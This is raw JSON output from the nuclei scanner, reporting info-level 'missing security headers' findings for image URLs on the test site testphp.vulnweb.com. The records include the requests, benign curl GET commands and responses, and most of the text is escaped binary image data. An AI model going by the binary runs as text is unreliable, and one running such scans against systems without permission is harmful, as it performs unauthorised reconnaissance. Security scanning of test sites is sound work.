\\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:21.426113258Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd n%\\ufffdp2\\u0000ɮ\\ufffd\\ufffd\\ufffd4gP\\ufffd@%Cn\\ufffd|\\ufffd\\ufffd\\ufffds\\u001e\\ufffd\\ufffd\\ufffd=\\u0002\\ufffd\\ufffd\\ufffdL\\ufffdwH\\ufffd\\ufffd\\ufffd\\u0005Q\\ufffd\\ufffd\\ufffdB\\ufffd\\u001carX\\ufffd[\\ufffd\\u0018\\ufffd^X\\ufffdZ\\ufffd\\ufffd\\u000fy\\ufffdR\\ufffd\\ufffd\\ufffdn\\u001e\\ufffd\\nѤ\\ufffd\\ufffd$3\\ufffd\\ufffd\\ufffd\\ufffd.s\\ufffdd`\\ufffd\\r\\ufffdU\\ufffd\\u0004\\ufffd\\ufffd\\u0011\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u000b\\ufffd|\\ufffdT\\r\\u000e\\ufffd\\ufffd\\ufffd\\u0000#\\ufffd\\ufffdzӲ\\ufffd\\ufffddRm\\ufffd\\ufffd-. \\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd`q\\ufffd\\ufffd7WW\\ufffd\\u0019\\u0004py\\ufffdKTw\\ufffd\\ufffd\\ufffd\\u0015k\\ufffd^\\u0026\\ufffd\\u0014dc\\ufffd\\u0015!\\u0019\\ufffdL#\\u0014\\ufffd\\u0013\\ufffdu\\ufffdQE\\u0015ĤS[\\ufffd:\\ufffd\\ufffd\\ufffdRٔ\\ufffdQEq8\\ufffd\\ufffd\\u0010x\\ufffd\\u003e\\ufffd\\u0016ݣv{\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdwY\\u000b\\ufffd\\ufffdE@op\\u0007\\u001f4G4\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffdYO\\ufffd\\ufffdG\\ufffdJ\\ufffd\\u0000u1\\ufffdp\\ufffd\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd]Һ\\ufffd\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffd+i\\u000b\\u003c\\u0013\\ufffd;\\ufffd\\u0002\\n\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd2\\u000b\\ufffd\\ufffdm6+\\ufffd\\u0016\\ufffd\\u0019\\ufffd\\ufffd\\u0006H\\ufffd\\ufffd2\\ufffd\\u0006\\ufffd\\u0002\\ufffd\\u0005H\\ufffd\\u0000H'#\\u000c8\\ufffd\\ufffdf\\ufffdw\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdt\\ufffd7\\ufffd\\ufffd\\ufffd`\\ufffd\\ufffdZ\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\u0004\\ufffd\\u000c\\ufffdq\\ufffd\\ufffd\\ufffdƈ+\\ufffd|f\\ufffd\\u001e\\ufffdR\\ufffd\\ufffd@w\\ufffd\\ufffd\\ufffd\\ufffd\\u003e$\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdP\\u0010v\\ufffd\\ufffd\\u00078\\ufffd \\u000e\\u000f\\u0000\\u001c5c\\ufffd\\ufffd\\ufffdx`\\u0019\\u0026\\u0017b_\\ufffdy \\u000c\\u00021\\ufffdry\\u003e\\u0006\\u0001\\ufffd\\ufffd\\ufffdL~\\ufffd麪J\\ufffd\\ufffd\\ufffd:X\\ufffd\\ufffd\\u0018\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdl(,s\\ufffdq\\ufffd\\ufffd8\\ufffdߤ\\ufffd\\ufffd\\ufffd^\\ufffd]\\t\\ufffd\\ufffd\\u0005e\\ufffd\\u0010\\u0006\\ufffd\\ufffd;\\ufffda\\ufffd\\u001d\\ufffd\\ufffdL\\ufffd\\ufffdg\\u0015V\\ufffd\\ufffd梮\\ufffd\\ufffd45\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffdu3Y\\u003cU\\u0014\\ufffd\\u0010\\ufffd\\\\G\\ufffd\\ufffd(\\ufffd\\ufffd\\u0000\\u0004S.\\u0000S\\ufffdv\\ufffd)]\\ufffd8?\\ufffdT\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6\\ufffdg;U\\u0007\\ufffd\\ufffd\\ufffd\\u0007\\ufffdp+Ch?\\ufffd\\ufffdeN\\ufffd͂\\ufffdz\\\\[\\u000b\\tV\\ufffd=1\\u0011f!\\ufffd\\ufffd\\u0018݁\\ufffd\\ufffd\\u0000+\\ufffd\\u0000\\ufffdO\\u0003\\ufffd\\u0006Z\\ufffd\\ufffd\\ufffd\\ufffdels\\u001cq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd\\u0003\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\u000cFv\\ufffd\\ufffdS\\ufffd\\u001dr\\ufffdD\\ufffd\\ufffd9\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\u0000O\\u0004!w˳n\\ufffd\\u0016*\\ufffd\\u0001\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\u0003\\ufffdU5\\ufffduN\\ufffd6\\ufffd\\u0026\\ufffdB\\ufffd{i\\ufffdh\\ufffd\\ufffd\\ufffde)\\u0018dS\\ufffd\\ufffd\\u001e\\t\\u0019\\ufffd\\u00185\\u001eA\\u001b/{\\\\\\u000e\\ufffdEE\\u003c\\ufffd0\\ufffd\\u001aE\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdEr\\ufffda\\ufffd$\\ufffd\\u0018\\ufffd\\ufffd\\ufffd.\\ufffd\\u0015\\ufffd\\ufffd(\\ufffd\\ufffdu\\ufffd$`\\r7a\\ufffd\\ufffdB\\u0001MU\\u0002\\ufffd{=-\\ufffd}\\ufffd5^\\ufffdq\\ufffd(\\\\7)\\ufffd3Y\\ufffd#\\ufffd5-\\u001e?B\\ufffdoRɑ\\ufffd\\ufffd\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI]\\ufffd\\ufffd;\\ufffdv\\ufffd\\ufffd\\ufffdTG\\ufffd\\ufffd\\ufffd\\ufffd9\\ufffd\\ufffd#A\\u001e)\\ufffd\\ufffd|f\\ufffd6+\\ufffd\\ufffd\\ufffdz]\\ufffd\\u0015\\ufffdݴ\\ufffd\\ufffd͆\\ufffd\\ufffdFSϴ\\ufffd\\ufffdmĀ\\ufffd\\n\\u0014}ÀvΐV\\ufffd\\ufffd$\\ufffd\\ufffdE\\ufffd\\ufffd\\u0008\\u001d\\ufffdd\\ufffdz{\\ufffdl\\u00000\\ufffd\\ufffd\\ufffdA\\ufffd\\u0018\\r\\ufffd\\ufffd+\\ufffdS\\ufffd\\u0015\\ufffd\\ufffd\\u0000\\ufffd̈:;U\\ufffd\\u0018\\ufffd\\ufffdo\\ufffdC\\u001e\\ufffd\\ufffd\\u000cH\\u0014\\ufffd9\\u0000\\ufffdnq\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\\\\\ufffdZ\\u0007\\ufffd\\u003cc\\ufffd\\u001f\\u001f\\ufffd{\\ufffdc\\u0012\\ufffd\\u001er\\ufffd\\u001d\\ufffdP\\ufffd@\\ufffd\\ufffdE\\u001c\\ufffd\\ufffd+\\ufffdW\\ufffdk\\ufffd^?\\u0004\\u000f\\ufffd\\ufffdS\\ufffd\\ufffdM\\ufffd\\u00078=\\ufffd\\ufffd\\ufffd\\ufffdHc\\ufffdy\\ufffd\\ufffd S#\\ufffd\\ufffd\\ufffd\\t\\ufffd\\ufffdo\\ufffd{)$g `\\ufffddR\\ufffd-\\ufffd\\ufffdb\\u0002\\ufffd\\ufffd\\u001d(!^\\ufffd\\ufffdL\\ufffd\\\\\\ufffdZ\\u0005\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd,ņ\\u0006;\\u000cg\\ufffd\\ufffd\\ufffd\\ufffdߨ\\ufffda\\ufffd\\ufffdԗ\\u001af\\ufffd,Q\\ufffdX\\ufffd\\ufffdn\\ufffd\\u0004\\ufffd\\u0000%\\ufffd9\\u0019V\\ufffd;\\ufffd3\\ufffd\\u001cv[\\ufffdk\\u000b)\\ufffdYA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdA\\ufffd\\u0019\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\ufffd\\ufffds~\\u003e\\ufffdc{q$\\ufffd4r\\u0008\\ufffd\\\"\\ufffdIȐ\\ufffd\\u003c\\ufffdKc䚶\\ufffd3Hǽ\\ufffd5\\r\\u0016h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffdAo\\ufffd\\ufffd\\ufffd[WGu\\ufffd\\ufffd\\ufffd\\ufffdjVs\\ufffd(\\ufffd}5\\ufffd.^\\u0010\\ufffd\\u00138bQ@]ː9\\u003c\\ufffd}\\ufffdkg\\ufffd\\u001f\\u0007k.@8a\\ufffd23\\ufffd\\ufffdkJ\\ufffd.\\ufffd\\ufffdӬn.\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffdE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\